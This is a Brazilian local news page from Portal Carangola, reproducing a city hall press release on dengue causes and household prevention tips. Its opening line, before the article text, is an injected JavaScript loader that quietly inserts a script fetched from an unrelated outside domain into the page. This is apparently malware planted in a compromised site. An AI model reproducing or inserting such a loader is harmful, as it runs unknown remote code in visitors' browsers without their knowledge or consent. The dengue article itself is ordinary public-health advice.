;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Lixo nos Quintais, Casas Fechadas e Resistência de Moradores São os Principais Motivos da Dengue. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Lixo nos Quintais, Casas Fechadas e Resistência de Moradores São os Principais Motivos da Dengue.

Sem a comunidade do nosso lado, não temos como vencer esta batalha. Cada município deve fazer sua parte e se possível, auxiliar o próximo. A Secretaria de Saúde e a FUNASA vem realizando trabalho intenso de prevenção.
Um dos principais problemas enfrentados pelos agentes de combate a dengue é que parte da comunidade ainda apresenta resistência em permitir a entrada dos profissionais nas residências. O comportamento tem atrapalhado o desenvolvimento das ações no Município.

A quantidade de lixo que os agentes encontraram nos quintais das residências contribuiu em muito para a ploriferação do mosquito da dengue no município de Carangola.

A população precisa se conscientizar que o problema da dengue é de todos.

O município deve alterar este tipo de procedimento. Até quem já recebeu a informação sobre como evitar a proliferação do mosquito transmissor da doença deve autorizar a vistoria do quintal ou locais onde pode haver acúmulo de água. 40 agentes da Funasa e da Secretaria de Saúde fizeram um mutirão para recolher lixos e entulhos dos quintais das casas.

Combate – Para evitar a proliferação do mosquito, a população deve se prevenir adotando pequenos costumes em casa, como evitar acúmulo de entulhos e lixos no quintal, pois ao contrário do que muitos imaginam o mosquito também reproduz em água suja.

Tratar a água da piscina com cloro e limpá-la uma vez por semana é outra ação importante e se não for usá-la, deve-se cobri-la bem. Se estiver vazia, a dica é que se coloque 1 kg de sal no ponto mais raso.

Outras ações simples, que devem fazer parte da rotina da população são as seguintes: se tiver cacos de vidro nos muros, deve-se colocar areia em todos aqueles que possam acumular água; entregar pneus velhos aos serviços de limpeza urbana e caso realmente precise mantê-los, guardá-los em local coberto; garrafas de vidro devem ser depositadas com a boca para baixo; manter ralos fechados e verificar regularmente se não há entupimento; retirar sempre a água da bandeja externa das geladeiras e lavá-la bem com água e sabão. Lave bem também os suportes para galões de água, sempre que for trocar o garrafão.

Temos que fazer nossa parte, senão o mosquito fará a dele…

Assessoria de Comunicação da Prefeitura de Carangola.

Ofertas

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.